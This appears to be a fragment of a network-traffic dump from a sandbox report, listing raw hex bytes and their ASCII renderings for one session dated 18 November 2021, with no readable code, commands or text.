                                                                                                                                                                                                  Data Ascii: DI]WylI)bpc@,%w;/VHapGC}=BW~bee:yn1n\L=*i0D+<-Om2\$Bc-nvnJ,vAWl\vSPO)f\1GC.`UM@qT\O<S'3G\!:g+17[tOs'(XC2-osApP{m:xw
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC442INData Raw: 50 21 da 2e b0 9f 4b fc ee 54 dc 43 7b 83 c9 31 bb 89 ef 38 6f 55 f4 f3 46 51 a8 35 03 bf 91 b8 66 10 12 f1 26 c3 f2 82 79 e9 76 f6 02 da d9 64 df 38 5b c2 40 4f 06 d6 04 26 dc 2d ee c1 93 dc 59 a0 00 38 ed e4 91 c1 4e d0 48 13 c2 4d d2 4d 57 bd cb 01 26 9d cb b3 54 81 1f 45 c9 25 ea 55 33 e7 6c 4b c3 37 e4 32 b7 39 c6 49 7f b3 ec fc 40 cf c0 6d 38 42 82 c3 58 25 12 0c 50 1c c3 60 e0 4b f2 7a ad 61 da 6e 2d 6d c5 ee 31 51 ea 5e 99 98 d0 1a f0 c5 24 51 d4 5a fc 46 a0 fb 1d f4 58 80 ea 54 85 2b d9 6e 55 37 00 5a 05 e9 cc 2c 73 86 27 cd c8 ca fe 17 0a 6f 76 b3 7a 40 f4 75 41 2b c7 9e 0c 5c da ce a7 25 65 34 97 2a 76 58 05 1b 8a 3b 05 12 69 86 4b 14 db 56 70 24 ca 41 2d 61 b4 48 f9 af cf cf 4e 90 2e aa a4 3f f1 5f a2 31 c1 fe 04 a7 c3 4a 03 f9 f0 34 6d 64 f1
                                                                                                                                                                                                  Data Ascii: P!.KTC{18oUFQ5f&yvd8[@O&-Y8NHMMW&TE%U3lK729I@m8BX%P`Kzan-m1Q^$QZFXT+nU7Z,s'ovz@uA+\%e4*vX;iKVp$A-aHN.?_1J4md
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC444INData Raw: a7 53 ba 4b 2a ff 52 89 b7 8c 02 2e 4d 1e f2 26 ad 73 32 de 42 51 36 b4 fe 8e a5 57 3f 5a 27 7c d6 c3 29 3c 3a 18 fc f7 a9 a1 c9 46 e2 05 dd 59 e5 70 0c 82 ad be 2a f0 14 96 17 66 58 ce 7c 09 1f 25 1c fa 60 3e 56 6c 4c b4 27 40 91 c6 8e 41 3f bb 14 e5 1e c3 9c d6 2a 2a 7d 7e ff 06 b3 48 3f e6 0d 43 3a 3b 20 5b a9 f9 35 54 3d 3a 3b fe f1 2d 69 d5 bf 40 3b d2 1f 72 20 07 85 21 40 ae 52 be ff f0 ee e1 34 eb a5 9d 3c fe 3b 31 0e 50 c3 24 87 79 15 c4 3c 7a 3f 3e e8 82 47 96 fe d6 3f d3 fe 70 6b 36 39 33 45 f0 09 9a c3 87 14 0c 25 a6 74 e1 b1 21 68 41 5b ab cb f9 6f f3 dd cd fe de b8 b2 61 fc dc 32 ca f9 8f ec 50 cb c9 43 5e 71 d3 9a d7 3f 1e df c1 20 9c 26 43 60 54 6c 90 80 56 29 89 96 64 41 67 a4 b8 f0 26 48 59 7a 3d 0e 76 e1 5f 24 dc bc a2 ac a5 42 60 da af
                                                                                                                                                                                                  Data Ascii: SK*R.M&s2BQ6W?Z'|)<:FYp*fX|%`>VlL'@A?**}~H?C:; [5T=:;-i@;r !@R4<;1P$y<z?>G?pk693E%t!hA[oa2PC^q? &C`TlV)dAg&HYz=v_$B`
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC445INData Raw: 06 b2 fa 3f 84 9b 57 6a 77 4b 3c 43 83 c9 c6 4a 93 3b cf 3f 58 b2 39 c1 c0 d6 f0 62 be de 18 75 db e1 ee 8d c7 e8 06 4d 67 32 cc fd 83 c4 26 97 b5 18 9f 26 72 64 d5 e3 a3 0c 3d 12 a5 cb 5b 77 56 b4 a4 7d d6 1a 20 90 d6 32 78 96 4c 91 40 3e 83 1e 5c 92 5f 13 74 b9 c3 2c 84 c7 ab 18 2d 95 b9 4a eb b2 b4 a1 5d 68 27 c7 49 cc 4e 1c e5 ab 29 fd 5a 42 f9 64 34 7f 58 97 40 79 e0 30 6d 58 f3 dc ca 94 e4 dc 40 95 1d aa 29 39 f3 32 48 ab 78 49 8c 49 f9 3b 7a e3 9c ee 36 42 53 c2 0f 08 93 40 1f 88 3a 97 87 ff bb b4 36 ab a2 6a 57 af 81 0c 07 a9 85 18 54 87 85 b4 bb aa 6f 2a dd 47 5e 50 f9 c3 30 60 f6 57 61 30 a9 4a c6 34 75 53 a1 f8 df 07 6a d4 e9 41 4b 12 08 b3 66 a4 b7 4c c3 4d c5 53 c6 58 f0 bc 0e ef a7 dd 07 1f 7f 97 5c 29 b8 3e 0d ab be c3 ce 00 0c 38 2b 4d 8c
                                                                                                                                                                                                  Data Ascii: ?WjwK<CJ;?X9buMg2&&rd=[wV} 2xL@>\_t,-J]h'IN)ZBd4X@y0mX@)92HxII;z6BS@:6jWTo*G^P0`Wa0J4uSjAKfLMSX\)>8+M
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC449INData Raw: 3d 7f 3b f4 4c 14 7c be b7 eb 82 8e a1 c5 3a 8e 2c b0 a4 06 6e 2b 25 26 6f 05 88 53 93 5e 95 e6 b3 d7 2b fe f4 e8 38 92 42 65 91 33 d8 14 3b 84 34 dc 0d d0 de 47 c4 ce d8 d9 6d 2d 17 31 a2 0e 68 45 db 3e 0b c1 81 ca 30 48 31 25 45 3c 16 20 a2 9c 60 20 4b c4 37 e5 4b b7 4d e9 4a 93 4c 83 62 5d 83 f1 ac 55 8b ab d2 5c 0a 93 60 b1 12 4e dc 47 e3 2d c4 57 fd 18 a7 34 1a 02 a8 08 86 8e 0e 1f b3 88 4a 38 ab b6 6d e3 90 8b 99 d9 62 65 c9 93 fe 80 a3 50 53 4f a7 1f 90 2e 9b 22 71 33 9a 6b 99 1d 29 f9 60 8d 0d ec e0 8e ef ee 70 5c 32 eb 4d 81 43 ee 43 5b 58 ef e8 9a 6b 1e 1a 2d b9 83 86 8b 8c 35 34 2c 8b d7 80 c6 94 b4 b7 90 60 54 82 b6 e7 0e ef 1a 56 f5 39 90 9d e5 bf eb ea 29 cb 96 60 3f 9c 05 e0 1f ed d6 9a 8c 56 84 7d 1f 91 39 2b f7 79 ce 67 39 04 2d 91 55 82
                                                                                                                                                                                                  Data Ascii: =;L|:,n+%&oS^+8Be3;4Gm-1hE>0H1%E< ` K7KMJLb]U\`NG-W4J8mbePSO."q3k)`p\2MCC[Xk-54,`TV9)`?V}9+yg9-U
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC453INData Raw: f0 5c eb c2 45 ef ea 6a 68 39 f2 72 eb 55 20 bf 1a aa 82 a8 0d 9b b8 6e 86 1d f8 36 c1 b4 25 99 2e 82 9c fc fe 96 23 6f 3b 53 f7 a0 ef 57 f2 6d 0c 0f 55 a8 e3 9b ec 86 0c 75 b5 8f df e9 f4 58 b6 50 0b ef e2 5d de d5 c7 57 ec b2 31 8b ee a9 03 b3 14 52 28 95 9a 5d c5 8a 11 61 1d 6b b4 83 e0 7f 92 1c 3a 99 90 80 82 4b f7 ca e5 80 24 a6 1e 9a b4 98 3e 13 95 c0 7f 88 ea ac fb 4c 34 6e e4 7d f5 72 bc 16 b2 18 ea 89 ee 6d f6 92 03 51 15 74 ac 74 a6 5a b2 38 2c ff ec 60 d0 a1 9b 6c 34 8b b0 e0 27 5f 8b 49 7a 95 85 74 7c 79 eb 7e 75 67 fb a4 02 29 eb 65 0e 90 df 8c 01 27 ef a2 0f e6 9b c8 78 9a 56 73 02 10 a8 16 1b 91 8f 34 cf 4c 82 fe e0 5b b5 74 6c db c2 ba c7 01 86 7f 1b 8d 36 c1 ea a6 35 23 f5 9f 39 02 81 d3 e0 3c c4 72 26 4f 04 1b d4 c4 23 58 8a 3b 1d 6b 7e
                                                                                                                                                                                                  Data Ascii: \Ejh9rU n6%.#o;SWmUuXP]W1R(]ak:K$>L4n}rmQttZ8,`l4'_Izt|y~ug)e'xVs4L[tl65#9<r&O#X;k~
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC457INData Raw: 2f 0d 87 88 6f 00 82 6e ff 02 1e 85 48 5f 64 29 83 07 8b 9b 3b 4b c5 c3 09 2f 22 22 13 e6 56 e7 36 18 62 9a 58 6f 36 ea 04 14 cc c6 92 3b 4a 88 6c 1e 43 df 9f dc f4 b5 97 64 8b b2 7d d2 3d 49 6b a5 fb b8 9b 31 9f 86 2f 1b 54 b7 8d 2c 78 25 21 e8 ec 34 3a 5f 89 3c 42 e3 4d 21 05 18 03 79 93 3f f3 b5 20 17 9f ea 83 2b 7f 28 4c 28 72 dd 9d 05 87 80 72 e7 bf d4 98 7b 6a 8f 5e b9 d9 0a 28 06 c3 f4 7e 42 55 ef 6c 08 69 6a 28 b8 77 ba 98 16 82 eb 0c e9 57 ef 15 dc 52 93 9b dc fb 92 81 10 79 fc a7 ea 89 52 5e ad 4a ea 91 ba 44 9a 8e b1 23 6a 6c 1e 9c f3 50 e9 89 4f a6 0d 10 f3 0a ec eb 86 8e 05 73 9a a3 1f 50 e0 98 54 7b 9a a1 cc 4d 8f 6f 90 7f 4c d1 24 c7 c4 a7 ef 34 f7 d8 fe 5f 85 8d a2 e7 7a bd 47 57 f2 a1 6c 4b 09 48 61 7e 52 1c 58 55 92 dc 53 7e ee a7 e4 13
                                                                                                                                                                                                  Data Ascii: /onH_d);K/""V6bXo6;JlCd}=Ik1/T,x%!4:_<BM!y? +(L(rr{j^(~BUlij(wWRyR^JD#jlPOsPT{MoL$4_zGWlKHa~RXUS~
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC461INData Raw: 07 db 16 a5 7e 9e 93 a0 18 95 92 0d ee 5d 98 5f be 3a ef 67 47 a1 b9 5d 5f 78 76 b1 fd 78 ca 86 c4 89 d8 b2 1c c1 eb 7b cd f1 7a 5c cd ba b9 71 eb 79 0b d8 7e ed 86 9c 28 8c 89 ce 92 89 00 3b 07 ea f0 07 ea 84 c2 a8 29 69 f0 5a 95 aa e3 40 f6 86 c5 89 30 46 e1 4b ab c4 a0 1e eb c9 54 97 af 96 bb 16 07 bf 86 9e e2 2e 32 95 1c 77 ed 97 8a bd 93 6c d7 43 b5 8f 7f 7b ea 8c 19 a8 a5 7c 82 09 b6 05 d0 56 aa d8 b6 9f 5d 45 22 63 6e bb e4 02 e8 93 f4 82 10 17 8c 5f b1 1c 87 bd aa 17 e4 00 6e 6e e1 5f e7 37 d8 c6 bb 8f 5b 97 cb 7a b6 df cf 40 ed 7f bc 60 1d 56 ec 53 7d 57 57 84 58 5a 24 d3 17 31 cd 35 f5 62 04 a3 03 e2 c8 f0 e3 56 40 74 08 d3 ca a3 ea 38 86 96 ef 7a 34 11 34 9f c1 6e f4 b7 23 e8 18 96 9a 74 50 9b b4 67 36 8b 47 37 1f 53 e7 af 9f 8a e5 6d 0c 8d ea
                                                                                                                                                                                                  Data Ascii: ~]_:gG]_xvx{z\qy~(;)iZ@0FKT.2wlC{|V]E"cn_nn_7[z@`VS}WWXZ$15bV@t8z44n#tPg6G7Sm
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC465INData Raw: 64 96 9a f7 79 f7 68 f8 73 8e dd be b2 fa 0a 27 33 53 67 93 40 4c 2a 4b 90 2b b8 4e 0d 40 79 0d c1 f0 3c 6e 38 c3 5d 01 31 e7 aa 2b 06 83 0a 00 1d fa ab 09 c3 38 94 3a 39 f4 90 f7 92 73 3c 17 d4 22 80 09 7f b2 73 0b 54 7a 38 99 85 52 82 03 91 8b 5a 0f c9 f9 51 38 b9 eb 3e 7a 9a 87 62 b3 03 9a 8e 1a 80 e3 0f 80 89 f1 22 e4 6d 8f 98 84 88 e9 0f 1c 24 19 15 7b cc 81 d5 79 62 e4 7f ee 0a 92 9e 6c 80 86 b8 da d6 01 1b 91 6b 12 7b ea 53 05 48 99 73 b9 70 32 75 9b be ea 60 60 c3 f5 63 a2 8c 08 17 9b c0 51 a3 a2 76 2d 14 f3 56 14 5f f4 9a 18 b1 fb 3e 1d 3a 4a a2 6e 91 bb 8e b4 97 83 70 1d 9b e1 97 d3 c9 97 ea 80 91 b7 7a ee 20 02 6e ea 75 1d 27 cd da 68 5e f9 6e 3b a5 e8 5d 9a 7b d9 39 90 90 d6 d7 9a b3 7f a1 20 58 8d 04 8e 9b 14 21 9b 5f 15 61 6d ef c6 91 c2 e0
                                                                                                                                                                                                  Data Ascii: dyhs'3Sg@L*K+N@y<n8]1+8:9s<"sTz8RZQ8>zb"m${yblk{SHsp2u``cQv-V_>:Jnpz nu'h^n;]{9 X!_am
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC469INData Raw: cf 75 f5 65 92 7c af 96 6b 80 f7 40 3c 6e 3a a4 b5 58 e2 9f 8e e8 ed 86 fb c6 09 2c c7 7d b3 ba bd 69 42 42 9b da 2b 85 98 96 90 b3 d9 a5 ec 20 f5 a1 ed 74 b3 91 f6 0f be 5c 72 1e ec 9c 3f 50 6b 76 79 38 05 75 88 ba 01 aa e7 69 39 e0 f7 4b 9a 9c 19 8b 8a 82 f1 66 20 58 e0 84 f6 8e 0f 83 fc a1 34 15 f1 54 1c 86 c3 47 e2 a7 f3 6e f9 77 e1 f5 a6 62 a1 b9 19 78 05 e9 22 7e c5 70 e6 48 1c 39 b0 bd eb 6f 17 0f 0a ef d9 79 a2 54 2b 9b 93 95 ee 8b 1f 42 99 39 2d 99 e9 5c f2 37 e3 14 51 9c 75 30 39 ac 26 94 62 6a 29 7c 88 10 05 d3 ee 4a 0e 97 8d 11 f4 61 f6 9a 16 cb d2 ae c2 3c b1 7f 3e 7b e5 3d e0 df c0 66 ec 7f a7 9c d4 b9 dc 9c 06 82 66 5f ef 72 aa ae 0b 1b ec 21 89 cc 78 c8 2f dd b3 8e 3c 05 8b 7d e3 50 8d 96 14 71 78 6f f0 04 0d 95 88 7d 6b a2 42 fa b4 31 2e
                                                                                                                                                                                                  Data Ascii: ue|k@<n:X,}iBB+ t\r?Pkvy8ui9Kf X4TGnwbx"~pH9oyT+B9-\7Qu09&bj)|Ja<>{=ff_r!x/<}Pqxo}kB1.
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC473INData Raw: 22 99 7f 86 30 3f be ab e0 14 31 21 5b 04 c2 8c 47 a6 5d 47 37 da 59 f8 32 22 26 1a 5c 44 30 8e bc 2a 72 8a 5b 07 f3 58 dc 94 ea b8 d5 0e e7 30 fe 0f 4b 11 48 04 52 b6 6f 83 ea f2 37 2b 45 f2 5d fc e9 d6 f7 50 6a c4 64 2a 3a 86 60 5c 50 ef 5c 60 0f bb 63 85 3e fa c5 29 96 64 cb 87 3b f7 f1 16 4f 95 38 02 b8 23 33 da 60 40 a4 34 7a 8a 5c ff 48 ff 33 fc 72 ea de 73 aa c9 72 29 85 85 ab 00 02 8b 7b 4c 05 d4 7d dd 51 93 4f f5 7a da 95 d7 82 e1 3b ed 40 02 5c 1e 76 ab a6 d7 3b 94 c7 3f 75 b8 cc 3a 94 de 39 0d 4a bb 6f e0 50 d2 76 07 3b 9b 30 ce 87 f1 3e 11 a6 2a 3a 3c ea 94 1a 50 32 96 5c 4d c0 2e fc 7c 41 83 92 1a 56 c8 cc da 55 07 4d 17 99 de 7a 54 39 2b 89 7e 3e 5c 58 06 3c ba 86 53 78 b1 99 f4 44 b5 66 5d 8b d2 bf 98 07 9a d2 3f af 5e 4c f1 a6 c8 f7 27 3b
                                                                                                                                                                                                  Data Ascii: "0?1![G]G7Y2"&\D0*r[X0KHRo7+E]Pjd*:`\P\`c>)d;O8#3`@4z\H3rsr){L}QOz;@\v;?u:9JoPv;0>*:<P2\M.|AVUMzT9+~>\X<SxDf]?^L';
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC477INData Raw: 3c 4a ed e5 58 5b 16 90 55 89 6a 62 33 4b 12 9b 03 87 d4 1f a9 47 b5 c2 9b d0 f2 3a a9 bf 0d 30 d6 6a 2f 8c 53 13 2f 39 04 a7 a0 2d 40 c9 11 42 f9 de 51 cf c9 87 b5 e5 c7 cb 41 23 41 ca 15 3c 74 27 52 84 e4 44 a7 8c 84 f7 4d 9d fa ff 86 35 21 3e 67 64 54 50 d2 2b 63 a0 e5 a8 36 d6 80 f8 43 98 e0 59 53 3a 51 45 b2 0a 90 83 b3 08 ca 11 9a 32 d5 c2 e3 7d 18 9f 0a 5b 2e ae 57 25 df af 5f ab f2 97 15 30 b4 a5 e9 c9 60 cf b2 4f 8a 59 16 45 8b e6 e1 a6 d3 70 0e 3d d6 f4 ab 36 9c 53 f2 22 46 32 d3 0c 24 a8 88 25 f6 34 6f a8 dc af 24 71 d4 b6 15 b1 01 dd 02 66 c1 50 43 57 c4 8f 6b 56 d9 6a 37 4e e0 3e 05 9c e3 57 dc 78 98 e4 0f a0 7e e3 8e 76 46 d4 7d 59 26 e7 43 5a df 37 60 42 c0 02 f6 b6 2c 6d 49 3c 91 63 59 f3 65 8e fb 4f 04 4c 62 6d a1 75 2b e6 ea 23 3b 58 c0
                                                                                                                                                                                                  Data Ascii: <JX[Ujb3KG:0j/S/9-@BQA#A<t'RDM5!>gdTP+c6CYS:QE2}[.W%_0`OYEp=6S"F2$%4o$qfPCWkVj7N>Wx~vF}Y&CZ7`B,mI<cYeOLbmu+#;X
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC482INData Raw: e2 88 a7 59 0b 01 0c 7c e7 64 05 b5 e9 8a 2b fa 7b ad b0 7c 7c 9c 1e 66 50 29 07 79 1f 08 9e 1f 17 93 a8 15 43 0a 28 75 b3 72 74 6f 17 62 b3 7f b5 fb 5f fb ee f7 b4 70 13 97 50 51 f6 79 3a 18 79 df 2b fc eb ad a0 48 dd 22 2f c1 83 b6 0f a0 b8 f8 28 e4 6a 61 37 2c e2 42 ae 7c 1c fb 23 67 d7 50 3b 51 23 21 26 12 58 78 0f 59 81 52 7f 7d dc 56 e2 02 33 6f ff 26 23 cf c1 a6 a3 71 99 9f 5d df 9b 98 9f 22 9a 11 c8 97 3f 7f 23 c3 f3 b0 55 34 d1 29 4c 2c b1 30 36 2e 88 31 9c d8 93 8c 23 89 c6 52 9e 30 c2 4c 83 22 cb 1d bf cb d6 77 de a2 28 59 fc aa 33 01 a4 b5 5b 7f c3 3a 48 19 ae 15 68 64 a7 d6 28 b5 c5 4a eb 4a 39 71 95 45 e2 a5 14 32 c2 23 79 55 70 e2 b1 20 ca 38 0e b5 22 af be 9e 43 3a 2b 57 2a 3e 1c 5b 53 22 9e 23 ea da ed a9 cf 79 2d 4b e6 2b 01 bf 8f 6a eb
                                                                                                                                                                                                  Data Ascii: Y|d+{||fP)yC(urtob_pPQy:y+H"/(ja7,B|#gP;Q#!&XxYR}V3o&#q]"?#U4)L,06.1#R0L"w(Y3[:Hhd(JJ9qE2#yUp 8"C:+W*>[S"#y-K+j
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC486INData Raw: 07 30 97 b9 1c 24 be e7 29 0a 0f 06 0a 46 39 aa f8 fb 5f f2 13 c5 68 7b dc 93 d4 93 e8 01 3d 2c fd 84 42 46 61 86 97 c9 4b 72 0a c1 85 5a 71 0b 22 d4 01 67 e6 04 5e ce 3c 86 37 54 80 15 40 1f e8 0b 0d 4c 36 0c 84 51 a9 b2 fe fe 3b 66 e7 dc b9 f2 25 e7 eb f7 d7 5b 7b 94 ff 69 15 f7 a4 0f 60 2e 73 39 48 6e bd 7a 97 4f ff dc 9f c7 27 7c da 9b f9 c3 ff fa e7 53 96 75 71 ff e6 fa c2 68 67 bc 50 8e ab c5 aa ac 17 eb aa 5e ac ab b0 50 d7 61 a1 ae c3 30 d4 1a 84 3a f4 43 1d 7a a1 0a 45 5d 87 a2 ae 6b 5f 57 c1 d7 65 fa 59 d7 45 a8 55 84 10 0a 05 f5 10 03 60 08 2c 00 4b c0 8a d0 aa d0 6a 4d bd 5a 51 ad 8c 35 5e f9 60 bd b3 6c d8 10 e8 09 15 42 9e a8 47 0e b0 b4 3d 35 f2 54 1d ec 5c 9e 0d f9 f2 19 ae 3e 30 e1 30 67 4d 1a 57 b5 8d 77 c6 4e c2 f5 06 45 d1 1f f4 06 45
                                                                                                                                                                                                  Data Ascii: 0$)F9_h{=,BFaKrZq"g^<7T@L6Q;f%[{i`.s9HnzO'|SuqhgP^Pa0:CzE]k_WeYEU`,KjMZQ5^`lBG=5T\>00gMWwNEE
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC489INData Raw: 1d de fe 1b a8 e7 06 60 2e 27 92 69 25 28 9c 6c 7d a7 ef 36 76 7b 0e f0 92 f5 25 96 94 7a fb 15 93 7d 2f 12 33 fe 2f 40 a2 f1 ce ae ff 69 4c a9 9a 69 0c da 51 1c b3 e4 61 b1 f5 a7 24 b9 c7 60 2f 1f 01 53 7c 04 b0 8e b4 86 d9 7d 22 79 e9 52 7a ad e2 73 ad 32 f3 61 b0 b4 ca 7f fe 8a d7 ab b9 01 98 4b 23 5f 36 23 e1 37 ed f2 d6 c4 bb e9 83 6b 43 5e 5c 19 b3 53 39 ce 0f 2b 0b c2 4b 56 a0 86 cf 6f 01 b1 aa c8 db 97 b3 fd 39 e3 7f 05 38 97 12 83 dd 36 da 47 5f 6d cb 50 9b 7d ba ff 9e 12 c9 8a 7f 74 3e 02 b1 98 b8 08 7a c4 0e c5 d2 a0 52 9c 62 e4 9c 2f fa fd 05 5f ce 67 03 ce e5 40 a9 49 34 b6 69 ab 80 73 3e f0 d7 7f f8 33 f9 d0 fa 80 df f6 73 6f 52 38 99 45 62 df be c4 b2 c4 79 89 ab 01 7b 51 4d 8d 5f 99 d4 e3 82 60 35 b6 ff b2 40 cb e7 77 ac 7b b1 5b f2 b3 a9
                                                                                                                                                                                                  Data Ascii: `.'i%(l}6v{%z}/3/@iLiQa$`/S|}"yRzs2aK#_6#7kC^\S9+KVo986G_mP}t>zRb/_g@I4is>3soR8Eby{QM_`5@w{[
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC493INData Raw: 44 48 9b 04 14 d1 03 70 69 5d b6 4c 2d 6f 76 9a 57 35 23 07 17 c1 84 e1 50 43 6e b1 48 bc d1 57 89 37 fd bd ce 76 9f 68 0c 64 58 70 10 96 7c 8f df f5 b1 9f ae a7 8c 84 dc 30 0a 68 8c 5d 66 f3 e9 ae fc 39 e6 cf ca bf 22 f4 54 2a ff d1 48 38 8e d1 d4 bf 67 d7 91 31 c5 07 3f ed a8 b7 d0 93 0e b6 3a a7 54 8c ab 2a b7 df 9a 24 03 39 49 4e c9 db af cd 11 42 48 0a df 1a 00 29 32 cd 38 33 bc 73 48 2e a2 ac 4e 27 0c 98 25 19 e2 1a c7 1d 9b a5 ba b7 32 41 c9 39 62 2c 7c 87 a8 20 fd d6 2a 59 70 a0 81 2f b8 ec 7c 7d b5 bf a0 9d 7a 1c 7c c3 92 7e d6 8c c1 94 47 62 e6 22 22 32 29 7f eb f6 77 a9 bc 32 e2 2f 73 f9 65 94 e5 53 97 f0 3b 94 ce eb d8 af 64 9f af 78 c2 27 38 d2 27 4c 7c cc 61 8e e3 b4 8d 3a 0e 83 e7 a3 b8 25 67 9c 4e 51 55 55 bf f3 78 36 02 96 a9 a4 9c 0b 09
                                                                                                                                                                                                  Data Ascii: DHpi]L-ovW5#PCnHW7vhdXp|0h]f9"T*H8g1?:T*$9INBH)283sH.N'%2A9b,| *Yp/|}z|~Gb""2)w2/seS;dx'8'L|a:%gNQUUx6
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC497INData Raw: 86 02 5d a5 7b 52 77 7b b7 9b b0 ab fc 53 a1 ab e5 f8 3c 80 72 5f ba 3b 7f 6e 79 fb 2b 3e f7 bf 56 db 3b 23 ab aa 7a 20 b1 2c e9 62 8c f1 95 c8 3c 2c 87 00 17 91 96 0c 86 69 fa b2 57 1a 81 1e 6d ab 9d 51 23 30 2d 07 1a 81 69 7c 58 c4 f3 c7 95 7f 9d 0c ea 91 dd 56 54 fc 8e f2 73 0b ec 9e a1 75 43 a3 45 7f b7 fa c1 d7 be 88 9f f3 f2 bf b1 10 7a 54 db 97 79 f9 97 ff 03 fc c2 6d 54 2d 50 6f 5f e5 dc c5 cf 9b 08 01 bc 7f d2 0e e5 d9 92 23 1b 80 bc ce ef cd 09 b4 56 20 a5 03 9b 02 de 44 b7 1b 99 55 08 4c 21 d4 21 8c ab ba de ac aa ea 5e 5d d7 b7 82 c2 16 91 df 7f c7 e2 5c 82 01 93 cc 36 dd 66 97 27 9d 18 1c d2 c1 a3 13 95 3e 19 0a 33 d4 94 12 97 9d 77 db bd 5e af 1a 04 19 56 f6 aa aa 5e 0a b5 ce d3 c2 7b af 80 1a 78 af 99 2d 08 7a 26 99 c0 cc e2 b0 82 78 dd 34
                                                                                                                                                                                                  Data Ascii: ]{Rw{S<r_;ny+>V;#z ,b<,iWmQ#0-i|XVTsuCEzTymT-Po_#V DUL!!^]\6f'>3w^V^{x-z&x4
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC501INData Raw: c9 31 7f 2a 94 24 93 90 63 fb a4 ea b9 2d 38 97 15 53 37 61 13 e3 03 12 11 65 21 0b 66 d4 82 bc f2 af 81 6e 1b dc 92 ec 86 c5 09 3d 99 a7 ff 0e e8 1e f0 40 b0 f5 ee 5f f7 e2 f8 5b bf e1 35 0c c3 d7 03 b4 bc 4b bf ee 73 69 e3 32 bf f9 db 7f 3b 2e 78 16 c6 0b 6c 2d 4f 92 72 d6 c0 57 7e d7 af 7a d2 97 72 2e 49 ce bc 01 98 25 bd 10 d3 ff 00 18 8c 3d ac ee 10 76 7a d4 99 76 34 2e 93 18 71 b4 76 9e 32 94 5d ff dc 5f b0 4a 34 0c b9 3a 70 a6 0d 40 16 8b 84 82 04 07 2e 8f 4c 48 92 71 4e 46 1d 43 85 10 9a b6 e2 c4 23 10 30 2a 89 31 68 84 6c 07 b4 95 d8 79 ee 59 84 f3 de 30 f4 ba b0 a4 f8 dc 55 0c ad 36 05 3b 97 2e 0d c7 df fe 8d af e1 7c f2 36 8a 6a 1e 6c 3f a5 f2 54 1a 80 1c 12 74 e5 fd d7 e0 95 5b 16 6a 33 c9 35 99 27 87 35 9c fd 03 5a 26 a1 11 11 d9 76 85 ec 25
                                                                                                                                                                                                  Data Ascii: 1*$c-8S7ae!fn=@_[5Ksi2;.xl-OrW~zr.I%=vzv4.qv2]_J4:p@.LHqNFC#0*1hlyY0U6;.|6jl?Tt[j35'5Z&v%
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC505INData Raw: 58 d0 35 5c 8f ce 73 79 28 24 eb 31 63 8c 76 57 3e 87 dc 2a d5 49 0c 6a 57 b0 83 51 a6 fa eb 82 99 dd 17 da 00 b6 c0 76 88 e3 da 77 81 11 d2 58 50 52 51 d9 33 43 5b 7b 36 e5 80 cb 7b 98 17 b0 f7 46 69 95 5f 13 ff 4e fe 4c bf c7 ff 83 14 ea a0 50 23 93 82 8a b5 fb 77 16 ca f1 f8 92 02 2f 21 7b 09 f1 82 12 8d 17 70 49 68 25 96 04 6d 0f c8 e7 38 32 71 f4 dd 60 dc da 5d 62 aa 4f a0 83 13 88 27 9b 3c 02 5a 20 90 24 d5 21 d4 d4 91 3c 33 19 00 99 99 9c 33 8b cf b5 ac f4 2d e5 56 86 40 1c 7e 99 4f 70 82 8f f2 45 33 90 7b ed cb b2 21 ce ca 1f 84 72 8b 76 95 2e d8 10 74 1e 71 cf b0 35 c1 03 e2 b6 41 1c 45 be 49 43 41 a6 6a 9e 03 38 5d 39 c4 be 1e f1 ea 69 52 e5 db df b4 f7 67 27 39 a8 28 41 92 9c 73 46 a0 5f 96 e3 d5 10 c2 55 a4 97 11 6f a2 cd f8 e7 72 df 62 ec ea
                                                                                                                                                                                                  Data Ascii: X5\sy($1cvW>*IjWQvwXPRQ3C[{6{Fi_NLP#w/!{pIh%m82q`]bO'<Z $!<33-V@~OpE3{!rv.tq5AEICAj8]9iRg'9(AsF_Uorb
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC509INData Raw: e5 6f 3f 34 f0 95 ff f7 af da 7b 34 ff f7 de 5d ef 7d cf 0f 4f 1e 6d 7c 63 3e 7e bb 1d 6d f5 57 5f fe 7e 22 c4 d5 aa 14 7a 05 cc 6a 17 cb 96 06 0c cd 58 11 9c b3 96 50 c4 88 dc 05 43 ac c1 d4 1f 7c a5 f6 db ff 38 d4 e1 21 3e 7f ca 69 c8 1e 40 97 68 a4 db 50 36 36 18 09 ab 25 06 75 1d ea 72 5c af 56 65 75 a1 28 fc 92 73 ae 6f 96 21 29 e9 83 9f 13 12 91 62 8f 33 ae 59 aa af e6 ba 58 2a f8 75 f1 fd c5 14 d4 b7 89 f9 9f cc 39 75 95 7f 44 74 e5 37 15 b3 fc 6b c4 52 df 1d a2 f2 7f 14 e3 a6 d0 3d a1 8d da aa ed 1d bf 31 fa 6f 57 ff 59 fd a5 3f f6 8f f4 e1 a5 1f 61 b7 d8 26 58 e8 70 01 9e de 59 b9 88 70 6d ae f3 90 be ee 85 8d 3a 52 90 5b f0 a9 47 de 19 85 a1 45 64 2b 58 43 9c 9a 59 77 6b a2 11 58 3c 5e 69 62 c6 55 7c 92 6b e2 61 9f bf 57 3f 73 3a 35 ff 74 e9 79
                                                                                                                                                                                                  Data Ascii: o?4{4]}Om|c>~mW_~"zjXPC|8!>i@hP66%ur\Veu(so!)b3YX*u9uDt7kR=1oWY?a&XpYpm:R[GEd+XCYwkX<^ibU|kaW?s:5ty
